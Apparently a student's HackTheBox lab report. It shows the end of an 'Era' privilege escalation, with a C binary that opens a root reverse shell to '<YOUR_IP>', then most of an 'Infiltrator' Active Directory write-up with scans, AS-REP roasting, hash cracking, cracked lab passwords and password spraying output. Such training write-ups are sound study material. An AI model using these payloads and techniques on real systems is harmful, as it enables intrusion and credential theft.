python3 -c 'import pty;[Link]("/bin/bash")'

yuri@era:~$ su eric

su eric

Password: America

 After successfully obtaining a reverse shell, the next step is to stabilize the session
for reliable interaction. Once stabilized, switch the user context to and retrieve the
flag from Eric's home directory.

cd /home/eric

eric@era:~$ ls -la

ls -la

total 28
drwxr-x--- 5 eric eric 4096 Jul 22 08:42 .

drwxr-xr-x 1 root root 4096 Jul 22 08:42 ..

-rw-r--r-- 1 eric eric 3771 Jan 6 2022 .bashrc

drwx------ 3 eric eric 4096 Sep 17 2022 .cache

drwxrwx--x 3 eric eric 4096 Jul 22 08:42 .local

drwx------ 2 eric eric 4096 Jul 22 08:42 .ssh

-rw-r--r-- 1 root eric 33 Jul 27 08:16 [Link]

eric@era:~$ cat [Link]

 cat [Link]
you will get the user flag
 LinPEAS revealed a potentially exploitable binary called , which may be useful for
privilege escalation to root.

eric@era:~$ ps aux | grep root

root 7540 0.0 0.0 2892 968 ? Ss 05:05 0:00 /bin/sh -c bash -c
'/root/initiate_monitoring.sh' >> /opt/AV/periodic-checks/[Link] 2>&1

root 7541 0.0 0.0 4784 3412 ? S 05:05 0:00 /bin/bash


/root/initiate_monitoring.sh

root 7551 0.0 0.0 2776 964 ? S 05:05 0:00 /opt/AV/periodic-checks/monitor

 Upon inspection, the binary was found to be executing as a background process


under the root user, indicating potential for privilege escalation.
 To exploit this vulnerability, we need to create a malicious executable and upload it
to the target system. However, since the binary enforces signature verification, we'll
use the private key obtained from to sign our payload. Begin by creating a file
named on your local machine.

└─$ cat exploit.c

#include <unistd.h>

int main() {

setuid(0); setgid(0);

execl("/bin/bash", "bash", "-c", "bash -i >& /dev/tcp/<YOUR_IP>/1337 0>&1", NULL);


return 0;

└─$ x86_64-linux-gnu-gcc -o monitor exploit.c -static

└─$ file monitor

monitor: ELF 64-bit LSB executable, x86-64, version

 To sign the malicious executable, we need to extract the private key from and use a
suitable signing tool or script that matches the verification method used by the
binary. This ensures our payload passes the signature check and gets executed with
root privileges.

git clone [Link]

cd linux-elf-binary-signer

make clean

gcc -o elf-sign elf_sign.c -lssl -lcrypto -Wno-deprecated-declarations

└─$ ./elf-sign sha256 [Link] [Link] monitor

--- 64-bit ELF file, version 1 (CURRENT), little endian.

--- 26 sections detected.

--- Section 0006 [.text] detected.

--- Length of section [.text]: 480697

--- Signature size of [.text]: 458

--- Writing signature to file: .text_sig

--- Removing temporary signature file: .text_sig

─$ mv monitor monitor.1

 Next, start a Python HTTP server on your local machine to host the signed malicious
executable. Then, from the Eric shell on the target system, download and place the
file into , where the binary scans for signed executables.
wget [Link]

rm monitor

mv monitor.1 monitor

chmod +x monitor

 And in local machine

└─$ nc -lnvp 1337

listening on [any] 1337 ...

connect to [[Link]] from (UNKNOWN) [[Link]] 55440

bash: cannot set terminal process group (8204): Inappropriate ioctl for device

bash: no job control in this shell

root@era:~# whoami

whoami

root

root@era:~# cd /root/

cd /root/

 With root access obtained, navigate to and use to capture the root flag.

5. Skills and Competencies Developed

 Technical Skills: Network scanning, vulnerability enumeration, reverse shell exploitation,


privilege escalation, compliance auditing.

 Tools Mastered: Nmap, Gobuster, Burp Suite, Netcat, LinPEAS.

 Security Knowledge: Linux privilege escalation vectors, Apache misconfiguration exploitation,


CIS benchmark alignment.

 Soft Skills: Structured reporting, problem-solving under constraints, logical workflow planning.

6. Feedback and Evidence

Evidence collected during the assessment included:


 Screenshots of nmap scans, directory listings, and privilege escalation proof (id, whoami).

 Configuration snapshots highlighting misconfigurations.

 Logs showing exploitation attempts and successful access.


Feedback from the lab environment confirmed all exploitation steps were valid and
reproducible, reinforcing the learning experience.

7. Challenges and Solutions

Challenge Solution

Difficulty identifying the correct exploit chain Conducted targeted enumeration and ruled out
due to multiple possible attack vectors. false positives through manual verification.

Privilege escalation path was not obvious due to Applied automated enumeration with LinPEAS to
disguised cron jobs. reveal hidden privilege escalation vectors.

Avoiding detection by triggering service errors Used throttled and manual exploitation methods to
during exploitation. prevent crashing services.

8. Outcomes and Impact

 Successfully gained full root access to the Era machine.

 Mapped all vulnerabilities and their exploit paths.

 Learned advanced enumeration techniques applicable in real-world pentests.

 Understood the importance of timely patching, credential hygiene, and access control.

 Gained experience in producing a professional, structured security assessment report.

9. Conclusion

The Era machine assessment provided a realistic penetration testing experience, allowing hands-on
practice of ethical hacking methodologies, compliance evaluation, and vulnerability remediation
planning. The findings reinforced the critical need for regular security audits, strict adherence to
configuration benchmarks, and proactive vulnerability management. This simulated engagement
strengthened both technical proficiency and reporting skills, contributing to readiness for real-world
cybersecurity roles.
3. Write a highly detailed and technical private report on [Link] documenting the complete
process of solving an active, insane-difficulty HackTheBox machine and capturing the flag. Your
report must include both successful and failed attempts, explaining why specific tools—such as
Nmap, Burp Suite, or custom scripts—were chosen and the penetration testing methodologies
followed. Focus on uncommon attack methods, develop custom scripts or payloads where
applicable, and incorporate network diagrams to illustrate the attack flow—the more detailed, the
better. Ensure that your NullClass username and a visible timestamp appear in your HackTheBox
session screenshots as proof of authenticity. Reflect on challenges faced, lessons learned, and
security implications of the vulnerabilities exploited. The Medium post must be private, ensuring
exclusivity. Strict originality is required—if any write-ups or materials about the selected machine
have already been published online before your Medium post, your submission will not be accepted.
Reports on retired machines are strictly prohibited, and non-compliance with these conditions will
lead to disqualification.

Prepared for: NULL CLASSES

Prepared by: Anurag Tiwari

Lab / Environment: Hack The Box — Machine “Infiltrator” (HTB Season 8)

Target: [Link] (Linux, insane difficulty)

The “Infiltrator” machine presents a long, multi-stage attack chain that closely resembles a real-world
red team engagement. The initial reconnaissance phase involved enumerating usernames from a
public-facing website, leveraging discovered identities to brute-force the username format, and
performing an AS-REP Roasting attack to obtain the first set of credentials. From there, lateral
movement was achieved through password spraying across other domain accounts, leading to a
foothold on a user in the Protected Users group, requiring Kerberos-based authentication.

Subsequent analysis using BloodHound identified a privilege escalation path to another domain user,
enabling a remote shell. Enumeration revealed the Output Messenger service, which was accessed via
SSH tunnels to retrieve sensitive credentials from chat logs and a compiled .NET executable. The
exploitation of a vulnerable calendar function provided further execution and persistence.

Pivoting deeper into the network, a PCAP file was recovered containing additional credentials and a
BitLocker backup file. By extracting the recovery key, decrypting the E: drive via RDP, and accessing
registry and [Link] backups, the domain password hashes were obtained. This led to control of a
user with ReadGMSAPassword privileges, ultimately allowing exploitation of ESC4 in Active Directory
Certificate Services (ADCS) to gain full Domain Administrator access.

The purpose of this engagement was not only to demonstrate exploitation techniques but also to
identify key remediation measures, strengthen defensive monitoring, and reinforce security posture
against similar attack chains in enterprise environments.

1. Introduction

Infiltrator is an Insane-rated Windows Active Directory machine on HackTheBox. The engagement


involved compromising a domain controller by exploiting multiple Active Directory misconfigurations,
certificate template vulnerabilities, and insecure credential storage. The attack path included
credential harvesting, lateral movement, privilege escalation, and ADCS exploitation.
2. Background

The target ([Link]) is a Windows Server 2019 domain controller for [Link]. Initial
enumeration revealed standard AD services (LDAP, Kerberos, SMB) alongside custom applications like
Output Messenger. Key vulnerabilities included AS-REP Roasting, insecure permissions (GenericAll,
ForceChangePassword), credential leaks in chat logs/PCAPs, BitLocker recovery key exposure, and
ADCS ESC4 exploitation.

3. Learning Objectives

1. AD Enumeration: Use BloodHound to visualize attack paths.

2. Credential Attacks: Leverage AS-REP Roasting, password spraying, and hash cracking.

3. Permission Abuse: Exploit GenericAll on OUs and ForceChangePassword.

4. Certificate Exploitation: Modify vulnerable certificate templates (ESC4).

5. Data Extraction: Decrypt BitLocker, parse [Link], and recover hashes.

4. Activities and Tasks

1. Reconnaissance:

o Nmap: Identified domain controller ports (53, 88, 389, 445).

o Feroxbuster: Enumerated web directories (static site).

o Netexec: Verified SMB domain/OS details.

2. Initial Access:

o Username Enumeration: Generated usernames from the website using username-


anarchy.

o AS-REP Roasting: Compromised [Link] via Kerbrute/GetNPUsers and cracked the hash
(WAT?watismypass!).

o Password Spraying: Found [Link] reused [Link]'s password.

3. Lateral Movement:

o BloodHound: Revealed [Link] had GenericAll over the MARKETING DIGITAL OU.

o DACL Abuse: Used [Link] to grant full control, then added a shadow credential
for [Link].

o Group Membership: Added [Link] to CHIEFS MARKETING (via BloodyAD) to


gain ForceChangePassword over [Link].

o WinRM Access: Changed [Link]'s password and accessed via Anurag-WinRM.

4. Privilege Escalation:

o Output Messenger:
 Logged in as [Link] (MessengerApp@Pass!) and extracted [Link]'s
password from the "Output Wall."

 Used the API (key from notes) to pull chat logs, revealing [Link]'s
password (m@rtinez@1996!).

 Executed a reverse shell via calendar-triggered BAT file.

o PCAP Analysis: Recovered BitLocker-backup.7z and cracked its password (zipper) to


obtain a recovery key.

o RDP & BitLocker: Decrypted the E: drive, revealing NTDS/SYSTEM backups.

o NTDS Dump: Extracted hashes via [Link], gaining lan_managment's


credentials (l@n_M@an!1331).

5. Domain Compromise:

o gMSA Abuse: lan_managment had ReadGMSAPassword for infiltrator_svc$.


Retrieved its NTLM hash (9ae7de37...).

o ADCS Exploitation:

 Modified the Infiltrator_Template (ESC4) using Certipy.

 Requested a certificate for administrator and obtained its NTLM hash


(1356f502...).

o Admin Access: Used the hash to gain a shell via Anurag-WinRM.

5. Practical

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# nmap -p- --min-rate 10000 [Link]

Starting Nmap 7.94SVN ( [Link] ) at 2025-07-15 13:24 EDT

Nmap scan report for [Link]

Host is up (0.087s latency).

Not shown: 65510 filtered tcp ports (no-response)

PORT STATE SERVICE

53/tcp open domain

80/tcp open http

88/tcp open kerberos-sec

135/tcp open msrpc

139/tcp open netbios-ssn

389/tcp open ldap

445/tcp open microsoft-ds


464/tcp open kpasswd5

593/tcp open http-rpc-epmap

636/tcp open ldapssl

3268/tcp open globalcatLDAP

3269/tcp open globalcatLDAPssl

3389/tcp open ms-wbt-server

5985/tcp open wsman

9389/tcp open adws

15220/tcp open unknown

15223/tcp open unknown

15230/tcp open unknown

49668/tcp open unknown

49688/tcp open unknown

49689/tcp open unknown

49692/tcp open unknown

49718/tcp open unknown

49741/tcp open unknown

49873/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 13.45 seconds

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# nmap -p
53,80,88,135,139,389,445,593,636,3268,3269,3389,5985,9389,15220,15223,15230,49668,49688,49
689,49692,49718,49741,49873 -sCV [Link]

Starting Nmap 7.94SVN ( [Link] ) at 2025-07-15 13:26 EDT

Nmap scan report for [Link]

Host is up (0.087s latency).

PORT STATE SERVICE VERSION

53/tcp open domain Simple DNS Plus


80/tcp open http Microsoft IIS httpd 10.0

|_http-server-header: Microsoft-IIS/10.0

| http-methods:

|_ Potentially risky methods: TRACE

|_http-title: [Link]

88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-15 17:27:23Z)

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site:
Default-First-Site-Name)

|_ssl-date: 2025-07-15T17:30:41+00:00; +32s from scanner time.

| ssl-cert: Subject:

| Subject Alternative Name: DNS:[Link], DNS:[Link], DNS:INFILTRATOR

| Not valid before: 2025-07-15T18:48:15

|_Not valid after: 2099-07-17T18:48:15

445/tcp open microsoft-ds?

593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0

636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site:
Default-First-Site-Name)

|_ssl-date: 2025-07-15T17:30:41+00:00; +32s from scanner time.

| ssl-cert: Subject:

| Subject Alternative Name: DNS:[Link], DNS:[Link], DNS:INFILTRATOR

| Not valid before: 2025-07-15T18:48:15

|_Not valid after: 2099-07-17T18:48:15

3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site:
Default-First-Site-Name)

|_ssl-date: 2025-07-15T17:30:41+00:00; +32s from scanner time.

| ssl-cert: Subject:

| Subject Alternative Name: DNS:[Link], DNS:[Link], DNS:INFILTRATOR

| Not valid before: 2025-07-15T18:48:15

|_Not valid after: 2099-07-17T18:48:15


3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site:
Default-First-Site-Name)

| ssl-cert: Subject:

| Subject Alternative Name: DNS:[Link], DNS:[Link], DNS:INFILTRATOR

| Not valid before: 2025-07-15T18:48:15

|_Not valid after: 2099-07-17T18:48:15

|_ssl-date: 2025-07-15T17:30:41+00:00; +32s from scanner time.

3389/tcp open ms-wbt-server Microsoft Terminal Services

| ssl-cert: Subject: commonName=[Link]

| Not valid before: 2025-07-15T13:20:17

|_Not valid after: 2025-01-29T13:20:17

|_ssl-date: 2025-07-15T17:30:41+00:00; +32s from scanner time.

| rdp-ntlm-info:

| Target_Name: INFILTRATOR

| NetBIOS_Domain_Name: INFILTRATOR

| NetBIOS_Computer_Name: DC01

| DNS_Domain_Name: [Link]

| DNS_Computer_Name: [Link]

| DNS_Tree_Name: [Link]

| Product_Version: 10.0.17763

|_ System_Time: 2025-07-15T17:29:58+00:00

5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

|_http-title: Not Found

|_http-server-header: Microsoft-HTTPAPI/2.0

9389/tcp open mc-nmf .NET Message Framing

15220/tcp open unknown

15223/tcp open unknown

15230/tcp open unknown

49668/tcp open msrpc Microsoft Windows RPC

49688/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0

49689/tcp open msrpc Microsoft Windows RPC


49692/tcp open msrpc Microsoft Windows RPC

49718/tcp open msrpc Microsoft Windows RPC

49741/tcp open msrpc Microsoft Windows RPC

49873/tcp open msrpc Microsoft Windows RPC

Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

| smb2-time:

| date: 2025-07-15T17:30:00

|_ start_date: N/A

| smb2-security-mode:

| 3:1:1:

|_ Message signing enabled and required

|_clock-skew: mean: 32s, deviation: 0s, median: 31s

Service detection performed. Please report any incorrect results at [Link] .

Nmap done: 1 IP address (1 host up) scanned in 206.61 seconds

 There’s a substantial amount of data to analyze. Standard domain controller ports are open,
including DNS (53), Kerberos (88), LDAP (389), SMB (445), RPC (135), and NetBIOS (139). The
hostname and domain are exposed, along with remote access services like WinRM (5985)
and RDP (3389). An HTTP server is active on port 80, with the page titled “[Link].” A
quick subdomain fuzzing with yielded no distinct responses. I’ve updated my hosts file with .
Additionally, ports 15220, 15223, and 15230 are open but currently unidentified, warranting
further investigation
 The target appears to be a digital marketing firm, as indicated by the HTTP service running on
port 80 with the page titled “[Link].”
 All hyperlinks navigate to sections within the same page, indicating a single-page layout.
 The main page loads as , suggesting it’s a static website.
 The site showcases seven individuals with their roles:
• David Anderson – Digital Marketer
• Olivia Martinez – Chief Marketing
• Kevn Turner – QA Tester
• Amanda Walker – Co-Founder
• Marcus Harris – Developer
• Lauren Clark – Digital Influencer
• Ethan Rodriguez – Digital Influenc

 The 404 error page is the default IIS (Internet Information Services) template, confirming the
use of Microsoft’s web server.
┌──(root㉿kali)-[/home/anurag/Downloads]

└─# feroxbuster -u [Link] -w /opt/SecLists/Discovery/Web-Content/raft-medium-


[Link] -x html --dont-extract-links

 Directory-Enumeration
I executed feroxbuster on the target site, adding the -x html flag because the site is HTML-
based, but the scan yielded no results.

___ ___ __ __ __ __ __ ___

|__ |__ |__) |__) | / ` / \ \_/ | | \ |__

| |___ | \ | \ | \__, \__/ / \ | |__/ |___

by Ben "epi" Risher 🤓 ver: 2.10.4

───────────────────────────┬──────────────────────

🎯 Target Url │ [Link]

🚀 Threads │ 50

📖 Wordlist │ /opt/SecLists/Discovery/Web-Content/[Link]

👌 Status Codes │ All Status Codes!

💥 Timeout (secs) │7

🦡 User-Agent │ feroxbuster/2.10.4

💲 Extensions │ [html]

🏁 HTTP methods │ [GET]

🔃 Recursion Depth │4

───────────────────────────┴──────────────────────

🏁 Press [ENTER] to use the Scan Management Menu™

──────────────────────────────────────────────────

404 GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter;
toggle off with --dont-filter

200 GET 617l 1638w 31235c [Link]


301 GET 2l 10w 149c [Link] => [Link]

301 GET 2l 10w 156c [Link] =>


[Link]

301 GET 2l 10w 152c [Link] => [Link]

301 GET 2l 10w 153c [Link] => [Link]

200 GET 617l 1638w 31235c [Link]

301 GET 2l 10w 155c [Link] => [Link]

400 GET 6l 26w 324c [Link]

400 GET 6l 26w 324c [Link]

400 GET 6l 26w 324c [Link]

400 GET 6l 26w 324c [Link]

400 GET 6l 26w 324c [Link]

400 GET 6l 26w 324c [Link]

400 GET 6l 26w 324c [Link]

400 GET 6l 26w 324c [Link]

400 GET 6l 26w 324c [Link]

400 GET 6l 26w 324c [Link]

400 GET 6l 26w 324c [Link]

400 GET 6l 26w 324c [Link]

[####################] - 2m 159504/159504 0s found:19 errors:0

[####################] - 2m 26584/26584 258/s [Link]

[####################] - 2m 26584/26584 259/s [Link]

[####################] - 2m 26584/26584 259/s [Link]

[####################] - 2m 26584/26584 259/s [Link]

[####################] - 2m 26584/26584 259/s [Link]

[####################] - 2m 26584/26584 259/s [Link]

I used the --dont-extract-links option to prevent feroxbuster from following embedded links to non-
essential resources such as images, JavaScript files, and other static content. This approach helps
reduce noise in the output and keeps the focus on directories and files that are more likely to be
relevant for enumeration.

SMB – TCP 445


Running netexec against the target revealed that the host is likely operating on either Windows 10 or
Windows Server 2019. The system has the hostname DC01 and belongs to the domain [Link].
The DC prefix in the hostname suggests that this machine may be a domain controller, which is
typically a high-value target in penetration testing due to its role in managing authentication and
network resources.

netexec identified the target as running either Windows 10 or Windows Server 2019. The machine’s
hostname is DC01, and it is part of the [Link] domain. The DC prefix in the hostname strongly
suggests that this system functions as a Domain Controller, which typically manages authentication,
user accounts, and network-wide policies—making it a high-value asset in the network.

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec smb [Link]

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01)
(domain:[Link]) (signing:True) (SMBv1:False)

SMB signing is enabled, and the legacy SMBv1 protocol is disabled on the target. Without valid
credentials, I am unable to enumerate or list available SMB shares, which limits further exploration of
the service at this stage.

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec smb [Link]

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01)
(domain:[Link]) (signing:True) (SMBv1:False)

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec smb [Link] --shares

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01)
(domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [-] IndexError: list index out of range

SMB [Link] 445 DC01 [-] Error enumerating shares: STATUS_USER_SESSION_DELETED

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec smb [Link] -u guest -p '' --shares

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01)
(domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [-] [Link]\guest: STATUS_ACCOUNT_DISABLED

┌──(root㉿kali)-[/home/anurag/Downloads]
└─# netexec smb [Link] -u oxdf -p '' --shares

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01)
(domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [-] [Link]\oxdf: STATUS_LOGON_FAILURE

--------------------------------------------------------------------------------------------------------------------------------------

Shell as `[Link]` – Authentication as `[Link]

Username Brute Force

From the target website, I gathered a list of seven employee names. Using the `username-anarchy`
tool, I generated a wordlist of potential usernames based on common naming conventions. The initial
input file, saved as `[Link]`, contains these names in the format specified by the `username-
anarchy` column headers. This list will serve as the basis for the brute-force attempt.

firstname lastname

David Anderson

Olivia Martinez

Kevn Turner

Amanda Walker

Marcus Harris

Lauren Clark

Ethan Rodriguez

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# /opt/username-anarchy/username-anarchy -i [Link] > [Link]

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# head [Link]

david

davidanderson

[Link]

davidand

daviande

davida

[Link]

danderson

adavid
[Link]

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# kerbrute userenum -d [Link] [Link] --dc [Link]

__ __ __

/ /_____ _____/ /_ _______ __/ /____

/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \

/ ,< / __/ / / /_/ / / / /_/ / /_/ __/

/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 15/07/25 - Ronnie Flathers @ropnop

2025/07/15 16:32:26 > Using KDC(s):

2025/07/15 16:32:26 > [Link]

2025/07/15 16:32:26 > [+] VALID USERNAME: [Link]@[Link]

2025/07/15 16:32:26 > [+] VALID USERNAME: [Link]@[Link]

2025/07/15 16:32:26 > [+] VALID USERNAME: [Link]@[Link]

2025/07/15 16:32:26 > [+] VALID USERNAME: [Link]@[Link]

2025/07/15 16:32:26 > [+] VALID USERNAME: [Link]@[Link]

2025/07/15 16:32:26 > [+] VALID USERNAME: [Link]@[Link]

2025/07/15 16:32:27 > [+] VALID USERNAME: [Link]@[Link]

2025/07/15 16:32:27 > Done! Tested 104 usernames (7 valid) in 0.966 seconds

The observed username format follows the pattern [first initial].[lastname].

AS-REP Roasting

With the compiled list of valid usernames, I can test for accounts that have the
DONT_REQUIRE_PREAUTH flag set. This is done using the [Link] script from the Impacket
toolkit. If any accounts are configured this way, it allows retrieval of AS-REP responses without prior
authentication, which can then be subjected to offline password cracking.

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# [Link] [Link]/ -dc-ip [Link] -usersfile valid_users


Impacket v0.11.0 - Copyright 2025 Fortra

[-] User [Link] doesn't have UF_DONT_REQUIRE_PREAUTH set

[-] User [Link] doesn't have UF_DONT_REQUIRE_PREAUTH set

[-] User [Link] doesn't have UF_DONT_REQUIRE_PREAUTH set

[-] User [Link] doesn't have UF_DONT_REQUIRE_PREAUTH set

[-] User [Link] doesn't have UF_DONT_REQUIRE_PREAUTH set

[-] User [Link] doesn't have UF_DONT_REQUIRE_PREAUTH set

$krb5asrep$23$[Link]@[Link]:55bacd8d8b7337e8481004cfa120d204$2c02190778c134
65bd999c4c267031fc37039b14df8a486e01b569907eeb4ba8071ba38b6d9b3ac748e3a425bbb43b75
9f636e3ceb99cf4ba6fe02d81b8b9ee79b4766be2797a7a827666bd402913fe59fa6a9b8b5938000b61
2c4a08c874d3ef91b9df2445636104c6bd9c84236c01386de53e6f7e7cb261bfc98dced925a6f0831f1e
deb6db1558e85c1ab7cb3364e421e8c9a114dce972e577feb92ce2e860f89c4280ab9c343c8bd523825
45080141f68aba560b8d5dff3bed1138a8ffdcd7d90cc685292750d52017d0f69c5e766781099fd8c85c
c91c186e70603162c77b334510ffad191a787fb58b81d0fc5bfef6

[Link] is confirmed to have the DONT_REQUIRE_PREAUTH flag enabled.

netexec is capable of extracting a Kerberos AS-REP hash through AS-REP Roasting as well. Additionally,
since the Infiltrator machine is set to retire, there is a development version of Kerbrute that can
automatically perform AS-REP Roasting whenever it detects a user account with the
DONT_REQUIRE_PREAUTH setting.

Hashcat
I will save the extracted hash to a file and use hashcat with the [Link] wordlist to attempt cracking
it. This process involves running a dictionary attack against the hash to recover the plaintext password,
leveraging hashcat’s optimized GPU-accelerated cracking capabilities.

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# hashcat [Link] /opt/SecLists/Passwords/Leaked-Databases/[Link]

hashcat (v6.2.6) starting in autodetect mode

...[snip]...

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.

The following mode was auto-detected as the only one matching your input hash:

18200 | Kerberos 5, etype 23, AS-REP | Network Protocol

...[snip]...

$krb5asrep$23$[Link]@[Link]:55bacd8d8b7337e8481004cfa120d204$2c02190778c134
65bd999c4c267031fc37039b14df8a486e01b569907eeb4ba8071ba38b6d9b3ac748e3a425bbb43b75
9f636e3ceb99cf4ba6fe02d81b8b9ee79b4766be2797a7a827666bd402913fe59fa6a9b8b5938000b61
2c4a08c874d3ef91b9df2445636104c6bd9c84236c01386de53e6f7e7cb261bfc98dced925a6f0831f1e
deb6db1558e85c1ab7cb3364e421e8c9a114dce972e577feb92ce2e860f89c4280ab9c343c8bd523825
45080141f68aba560b8d5dff3bed1138a8ffdcd7d90cc685292750d52017d0f69c5e766781099fd8c85c
c91c186e70603162c77b334510ffad191a787fb58b81d0fc5bfef6:WAT?watismypass!

...[snip]...

The hash is successfully cracked in under a second, revealing the password: WAT?watismypass!.

Password-Validation
Testing the recovered credentials confirms that the password is valid for SMB authentication, granting
access to shared resources on the target system. This successful validation indicates that the
compromised account can now be leveraged for further enumeration or potential lateral movement
within the network.

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec smb [Link] -u [Link] -p 'WAT?watismypass!'

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01)
(domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [+] [Link]\[Link]:WAT?watismypass!

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec winrm [Link] -u [Link] -p 'WAT?watismypass!'


WINRM [Link] 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01)
(domain:[Link])

WINRM [Link] 5985 DC01 [-] [Link]\[Link]:WAT?watismypass!

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec rdp [Link] -u [Link] -p 'WAT?watismypass!'

RDP [Link] 3389 DC01 [*] Windows 10 or Windows Server 2016 Build 17763
(name:DC01) (domain:[Link]) (nla:True)

RDP [Link] 3389 DC01 [+] [Link]\[Link]:WAT?watismypass!

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec smb [Link] -u [Link] -p 'WAT?watismypass!' --shares

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01)
(domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [+] [Link]\[Link]:WAT?watismypass!

SMB [Link] 445 DC01 [*] Enumerated shares

SMB [Link] 445 DC01 Share Permissions Remark


SMB [Link] 445 DC01 ----- ----------- ------

SMB [Link] 445 DC01 ADMIN$ Remote Admin

SMB [Link] 445 DC01 C$ Default share

SMB [Link] 445 DC01 IPC$ READ Remote IPC

SMB [Link] 445 DC01 NETLOGON READ Logon server share

SMB [Link] 445 DC01 SYSVOL READ Logon server share

There is nothing of significant interest within the accessible SMB shares.

Authenticated as [Link]

User Enumeration

Although I previously identified seven usernames from the target website, it is worthwhile to perform
a broader enumeration to discover any additional accounts that may exist on the system or within the
domain. Identifying more users increases the potential attack surface and could reveal higher-
privileged accounts.

┌──(root㉿kali)-[/home/anurag/Downloads] netexec smb [Link] -u [Link] -p


'WAT?watismypass!' --users
SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01)
(domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [+] [Link]\[Link]:WAT?watismypass!

SMB [Link] 445 DC01 -Username- -Last PW Set- -BadPW- -Description-

SMB [Link] 445 DC01 Administrator 2024-07-15 19:58:28 0 Built-in


account for administering the computer/domain

SMB [Link] 445 DC01 Guest <never> 0 Built-in account for


guest access to the computer/domain

SMB [Link] 445 DC01 krbtgt 2024-07-15 17:36:16 0 Key Distribution


Center Service Account

SMB [Link] 445 DC01 [Link] 2024-07-15 18:56:02 0

SMB [Link] 445 DC01 [Link] 2024-07-15 19:04:24 0

SMB [Link] 445 DC01 [Link] 2024-07-15 01:56:45 0

SMB [Link] 445 DC01 [Link] 2024-07-15 15:41:03 0

SMB [Link] 445 DC01 [Link] 2024-07-15 22:06:28 0

SMB [Link] 445 DC01 [Link] 2024-07-15 15:40:35 0


MessengerApp@Pass!

SMB [Link] 445 DC01 [Link] 2024-07-15 01:56:45 0


SMB [Link] 445 DC01 winrm_svc 2024-07-15 22:42:45 0

SMB [Link] 445 DC01 lan_managment 2024-07-15 22:42:46 0

SMB [Link] 445 DC01 [*] Enumerated 12 local users: INFILTRATOR

[Link] looks like they have a password in the LDAP comment, but it doesn’t work on the domain:

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec smb [Link] -u [Link] -p 'MessengerApp@Pass!'

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01)
(domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [-] [Link]\[Link]:MessengerApp@Pass!


STATUS_LOGON_FAILURE

I will set this enumeration aside for later use.

Password Spraying

At this point, I have obtained two known passwords. I will perform a password spray attack by testing
these passwords against the expanded list of identified users. This method allows me to efficiently
check for credential reuse across multiple accounts while minimizing the risk of account lockouts by
limiting the number of login attempts per user.

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec smb [Link] -u valid_usernames.txt -p passwords --continue-on-success


SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01)
(domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [-] [Link]\[Link]:WAT?watismypass!


STATUS_ACCOUNT_RESTRICTION

SMB [Link] 445 DC01 [+] [Link]\[Link]:WAT?watismypass!

SMB [Link] 445 DC01 [-] [Link]\[Link]:WAT?watismypass!


STATUS_ACCOUNT_RESTRICTION
SMB [Link] 445 DC01 [-] [Link]\[Link]:WAT?watismypass!
STATUS_LOGON_FAILURE

SMB [Link] 445 DC01 [-] [Link]\[Link]:WAT?watismypass!


STATUS_LOGON_FAILURE

SMB [Link] 445 DC01 [-] [Link]\[Link]:WAT?watismypass!


STATUS_LOGON_FAILURE

SMB [Link] 445 DC01 [-] [Link]\[Link]:WAT?watismypass!


STATUS_LOGON_FAILURE

